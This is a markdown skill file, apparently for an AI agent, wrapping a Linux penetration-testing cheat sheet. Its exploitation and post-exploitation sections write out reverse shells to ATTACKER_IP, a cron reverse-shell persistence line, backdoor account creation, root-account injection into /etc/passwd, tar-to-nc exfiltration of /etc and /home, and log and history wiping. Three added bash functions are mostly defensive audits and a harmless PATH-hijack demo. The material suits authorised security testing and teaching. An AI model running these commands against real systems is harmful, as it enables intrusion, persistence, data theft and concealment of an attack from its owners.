Practical Linux command reference and penetration testing notes for reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation phases
---
name: linux-pentester-command-reference
description: Practical Linux command reference for penetration testing reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
triggers:
- "show me pentesting commands for reconnaissance"
- "how do I enumerate services on Linux"
- "what are common privilege escalation techniques"
- "give me Linux post-exploitation commands"
- "show me pentesting command cheatsheet"
- "how to do local enumeration on Linux"
- "what commands for exploitation on Linux systems"
- "help with Linux privilege escalation"
---
# Linux Pentester Command Reference
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
The **Linux for a Pentester** repository is a comprehensive command reference for penetration testers working with Linux systems. It provides practical, real-world commands organized by penetration testing phases: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation. This is a knowledge base, not a tool to install—use it as a reference guide during security assessments.
## Repository Structure
The repository is organized into modules by testing phase:
- **00-General-Commands**: Essential Linux survival commands
- **01-Recon**: Local and network reconnaissance
- **02-Enumeration**: Service and user data enumeration
- **03-Exploitation**: Initial access techniques
- **04-Privilege-Escalation**: Privilege escalation methods
- **05-Post-Exploitation**: Persistence and lateral movement
- **Cheatsheets**: Quick reference one-liners
## Installation
This is a reference repository—clone it for offline access:
```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```
No additional installation required. Navigate directories for specific command references.
## Key Command Categories
### General Commands (Survival Kit)
Essential commands for basic system navigation and file operations:
```bash
# File operations
ls -la # List all files with permissions
cat /etc/passwd # View user accounts
find / -name "*.conf" 2>/dev/null # Find config files
grep -r "password" /var/www/ # Search for sensitive strings
# System information
uname -a # Kernel and system info
whoami # Current user
id # User and group IDs
hostname # System hostname
```
### Reconnaissance Commands
Local system reconnaissance:
```bash
# User enumeration
cat /etc/passwd # List all users
cat /etc/group # List all groups
w # Who is logged in
lastlog # Last login information
history # Command history
# Network reconnaissance
ifconfig -a # Network interfaces
ip addr show # IP addresses (modern)
ip route # Routing table
ss -tulpn # Listening TCP/UDP sockets with owning process (PIDs of other users need root)
netstat -tulpn # Same view with legacy net-tools
arp -a # ARP cache
# Process enumeration
ps aux # All running processes
ps -ef --forest # Process tree
top # Interactive process viewer
```
### Enumeration Commands
Deep service and configuration enumeration:
```bash
# Service enumeration
systemctl list-units --type=service # Systemd services
service --status-all # SysV services
chkconfig --list # Service autostart config
# File permission enumeration
find / -perm -4000 -type f 2>/dev/null # SUID binaries
find / -perm -2000 -type f 2>/dev/null # SGID binaries
find / -writable -type f -not -path "/proc/*" 2>/dev/null # Writable files (skip /proc noise)
# Cron job enumeration
cat /etc/crontab
ls -la /etc/cron.*
crontab -l # User cron jobs
# Capability enumeration
getcap -r / 2>/dev/null
# Mounted filesystems
mount # Show mounted filesystems
cat /etc/fstab # Filesystem mount config
df -h # Disk usage
```
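Most of the SUID list on any host is the set of binaries the distribution ships; the interesting part is what is left after removing them. The following is an added example, not code from the Linux-for-a-Pentester repository: it wraps the SUID/SGID `find` above in a function and diffs the result against a baseline file (one absolute path per line). The scratch tree, file names and baseline used in the demo are constructed for illustration, not any distribution's real list.

```bash
#!/usr/bin/env bash
# Added example, not code from the Linux-for-a-Pentester repo: the SUID/SGID
# search from the enumeration block, with the step most people do by eye
# (ignoring the binaries every distribution ships) turned into a diff against a
# baseline file. The baseline format is one absolute path per line. The scratch
# tree, file names and baseline in the demo are constructed, not a real
# distribution's list.

# suid_list DIR: SUID or SGID regular files under DIR, sorted, errors silenced.
suid_list() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# unexpected_suid LISTING BASELINE: paths in LISTING absent from BASELINE.
# comm needs both inputs sorted; sort -u also drops duplicates.
unexpected_suid() {
    local a b
    a=$(mktemp)
    b=$(mktemp)
    sort -u "$1" > "$a"
    sort -u "$2" > "$b"
    comm -23 "$a" "$b"
    rm -f "$a" "$b"
}

# demo_unexpected_suid: builds a scratch tree with two expected SUID/SGID files,
# one unexpected SUID file and one plain file, and prints only the unexpected one.
demo_unexpected_suid() {
    local root listing baseline
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/opt"
    : > "$root/bin/passwd"; chmod 4755 "$root/bin/passwd"   # expected SUID
    : > "$root/bin/wall";   chmod 2755 "$root/bin/wall"     # expected SGID
    : > "$root/opt/backup"; chmod 4755 "$root/opt/backup"   # unexpected SUID
    : > "$root/bin/true";   chmod 0755 "$root/bin/true"     # no special bits
    listing=$(mktemp)
    baseline=$(mktemp)
    suid_list "$root" > "$listing"
    printf '%s\n' "$root/bin/passwd" "$root/bin/wall" > "$baseline"
    unexpected_suid "$listing" "$baseline"
    rm -rf "$root" "$listing" "$baseline"
}
```

On a real target the calls are `suid_list / > suid.txt` followed by `unexpected_suid suid.txt baseline.txt`, where `baseline.txt` was captured from a clean install of the same image; anything it prints is what to look up on GTFOBins first.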
### Exploitation Commands
Common exploitation techniques:
```bash
# Reverse shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
nc -e /bin/bash ATTACKER_IP 4444 # Only nc builds that support -e (ncat, netcat-traditional)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'
# Shell upgrading
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice
# File transfer
# On attacker
python3 -m http.server 8000
nc -lvnp 4444 > received_file
# On target
wget http://ATTACKER_IP:8000/file
curl http://ATTACKER_IP:8000/file -o file
nc ATTACKER_IP 4444 < file_to_send
```
### Privilege Escalation Commands
Common privilege escalation vectors:
```bash
# Automated enumeration
# Download and run linpeas.sh
wget http://ATTACKER_IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Manual SUID exploitation
find / -perm -4000 2>/dev/null
# Check GTFOBins for SUID binary exploits
# Sudo exploitation
sudo -l # List sudo privileges
sudo -u#-1 /bin/bash # CVE-2019-14287: needs sudo < 1.8.28 and a rule such as (ALL, !root)
# Capabilities exploitation
getcap -r / 2>/dev/null
# Example: python with cap_setuid
/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Kernel exploits
uname -a # Check kernel version
searchsploit "Linux Kernel 4.4" # Search for exploits
# Writable /etc/passwd
openssl passwd -1 -salt xyz password123 # Prints the MD5-crypt hash to paste into the line below
echo 'newroot:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd # Single quotes keep the $ signs literal
# Path hijacking
echo $PATH
export PATH=/tmp:$PATH
# Create a same-named binary in /tmp; pays off when a root cron job or sudo rule calls the command by bare name
```
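The PATH hijacking entry above stops at "create a malicious binary". What follows is an added example, not code from the Linux-for-a-Pentester repository, that carries the technique through in a scratch directory: a "victim" script stands in for a root cron job or sudo rule that calls `ls` by bare name, a look-alike `ls` in a directory that sorts earlier in PATH is what actually runs, and the same script run under a fixed PATH (as sudo's `secure_path` enforces) is unaffected. The file and directory names are assumptions for the demo, and the planted `ls` only announces itself rather than doing anything harmful.

```bash
#!/usr/bin/env bash
# Added example, not code from the Linux-for-a-Pentester repo: the PATH
# hijacking step above, carried through end to end in a scratch directory.
# A "victim" script stands in for a root cron job or sudo rule that calls
# `ls` by bare name; a look-alike `ls` in a directory that sorts earlier in
# PATH is what actually runs. All file and directory names are assumptions
# for the demo.

# writable_path_dirs PATHVALUE: print the PATH entries the current user can
# write to. Any hit is a hijack candidate for commands run by other users
# with that PATH.
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        if [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
        fi
    done
    return 0
}

# make_victim DIR: a script that runs `ls -d /` without an absolute path.
make_victim() {
    printf '#!/bin/sh\nls -d /\n' > "$1/report.sh"
    chmod 755 "$1/report.sh"
}

# plant_fake_ls DIR: the attacker's stand-in for /bin/ls. A real payload would
# drop a SUID shell or call back; this one only announces itself.
plant_fake_ls() {
    printf '#!/bin/sh\necho HIJACKED\n' > "$1/ls"
    chmod 755 "$1/ls"
}

# run_with_path PATHVALUE SCRIPT: run SCRIPT under the given PATH and return
# its first output line.
run_with_path() {
    PATH="$1" sh "$2" | head -n 1
}

# demo_path_hijack: prints "<attacker PATH result> <hardened PATH result>",
# i.e. "HIJACKED /" when the hijack works and the fixed PATH defeats it.
demo_path_hijack() {
    local work evil hijacked safe
    work=$(mktemp -d)
    evil="$work/writable"
    mkdir -p "$evil"
    make_victim "$work"
    plant_fake_ls "$evil"
    # Attacker's PATH: writable directory searched first (export PATH=/tmp:$PATH).
    hijacked=$(run_with_path "$evil:/usr/bin:/bin" "$work/report.sh")
    # Hardened PATH: fixed system directories only, as sudo's secure_path does.
    safe=$(run_with_path "/usr/bin:/bin" "$work/report.sh")
    rm -rf "$work"
    printf '%s %s\n' "$hijacked" "$safe"
}
```

During enumeration, `writable_path_dirs "$PATH"` on the target (or on the PATH string found in a cron job or sudoers `env_keep`) tells you whether this vector is open at all; the fix on the defending side is absolute paths in privileged scripts and a `secure_path` that excludes user-writable directories.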
### Post-Exploitation Commands
Persistence and lateral movement:
```bash
# SSH key persistence
mkdir -p ~/.ssh
chmod 700 ~/.ssh # sshd refuses keys in a group- or world-writable .ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# User creation
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor # Group is "wheel" on RHEL-family systems
# Cron persistence ("crontab -" replaces the whole crontab, so keep the existing entries)
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -
# Data exfiltration
tar czf - /etc /home | nc ATTACKER_IP 5555 # Attacker side: nc -lvnp 5555 > loot.tgz
find / -name "*.db" -o -name "*.sql" 2>/dev/null
# Log cleanup
: > /var/log/auth.log # Truncate (echo "" would leave a blank line behind)
unset HISTFILE # Stop the current shell from writing history on exit
history -c
rm ~/.bash_history
ln -sf /dev/null ~/.bash_history
```
## Common Patterns
### Full Enumeration Workflow
```bash
# 1. System information
uname -a
cat /etc/*-release
hostname
id
# 2. User enumeration
cat /etc/passwd
ls -la /home/
# 3. Network enumeration
ip addr
ss -tulpn
cat /etc/hosts
# 4. Service enumeration
ps aux
systemctl list-units --type=service
# 5. File permission checks
find / -perm -4000 2>/dev/null
find / -writable -type f 2>/dev/null
# 6. Scheduled tasks
cat /etc/crontab
crontab -l
# 7. Sudo rights
sudo -l
```
### Quick Privilege Escalation Check
```bash
# One-liner privilege escalation check
(sudo -l; find / -perm -4000 -type f 2>/dev/null; getcap -r / 2>/dev/null; cat /etc/crontab; ls -la /etc/cron.*; grep -v "nologin" /etc/passwd)
```
## Troubleshooting
### Command Not Found
Some commands may not be available on minimal systems:
```bash
# If netstat not available, use ss
ss -tulpn
# If ifconfig not available, use ip
ip addr show
# If wget not available, use curl
curl -O http://example.com/file
```
### Permission Denied
```bash
# Redirect stderr to hide permission errors
find / -name "*.conf" 2>/dev/null
# Use sudo if available
sudo find / -name "*.conf"
```
### Limited Shell Issues
```bash
# If no tab completion or arrow keys
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# If terminal size wrong
stty rows 50 cols 200
```
## Best Practices
1. **Always redirect errors**: Use `2>/dev/null` to avoid cluttering output
2. **Check sudo privileges first**: `sudo -l` often reveals quick wins
3. **Enumerate writable directories**: `/tmp`, `/dev/shm` for staging exploits
4. **Document findings**: Keep notes of enumeration results
5. **Clean up artifacts**: Remove uploaded tools and created files
6. **Use environment variables**: Store attacker IP as `$ATTACKER_IP` for reusable commands
## Integration with Testing Tools
```bash
# Export enumeration data
ps aux > processes.txt
ss -tulpn > ports.txt
find / -perm -4000 2>/dev/null > suid.txt
# Parse with common tools
# Filter on the full line first: after cut drops the shell field, grep -v "nologin" matches nothing
grep -v "nologin" /etc/passwd | cut -d: -f1,3,6
```
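The quick privilege escalation check and the parsing snippet above both read `/etc/passwd` but stop at listing accounts with a shell. The following is an added example, not code from the Linux-for-a-Pentester repository, that turns those checks into functions over any passwd-format file and adds the two signs of the writable-`/etc/passwd` technique from the privilege escalation section: a second UID-0 account and a password hash stored in passwd itself rather than in shadow. The sample file, its user names and its placeholder hash are constructed for the demo; the hash is not a real MD5-crypt value.

```bash
#!/usr/bin/env bash
# Added example, not code from the Linux-for-a-Pentester repo: /etc/passwd
# checks written as functions over a passwd-format file so they run against a
# constructed sample as easily as against the real file. Sample content and
# the placeholder hash below are made up for the demo.

# interactive_accounts FILE: user, UID and home for accounts with a real login
# shell. Filter on the full line BEFORE cutting fields; once cut has dropped
# the shell column there is nothing left for grep -v to match.
interactive_accounts() {
    grep -vE ':(/usr/sbin/nologin|/sbin/nologin|/bin/false|/bin/sync)$' "$1" | cut -d: -f1,3,6
}

# uid0_accounts FILE: every account whose UID is 0. Anything beyond "root" is
# the signature of the writable-/etc/passwd technique (or an unusual but
# legitimate toor-style account that deserves a question either way).
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# local_hash_accounts FILE: accounts whose password field holds a hash instead
# of "x" or "*". Modern systems keep hashes in /etc/shadow, so a hash in passwd
# means the file was edited by hand.
local_hash_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "" { print $1 }' "$1"
}

# passwd_writable FILE: "writable" if the current user can modify FILE, which
# is the precondition for the technique in the first place.
passwd_writable() {
    if [ -w "$1" ]; then echo writable; else echo read-only; fi
}

# sample_passwd: constructed passwd content with one planted UID-0 entry
# carrying a placeholder (not real) MD5-crypt hash.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc:x:1001:1001::/opt/svc:/bin/false
newroot:$1$xyz$PLACEHOLDERHASHxxxxxxx:0:0:root:/root:/bin/bash
EOF
}
```

Against a live host the same functions take `/etc/passwd` directly; `uid0_accounts /etc/passwd` printing more than `root`, or `local_hash_accounts /etc/passwd` printing anything at all, is worth a line in the report whether you are the one who put it there or the one who found it.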
## Reference
For detailed command explanations, navigate to specific module directories in the cloned repository. Each module contains markdown files with comprehensive notes and examples.
Creator's repository · aradotso/security-skills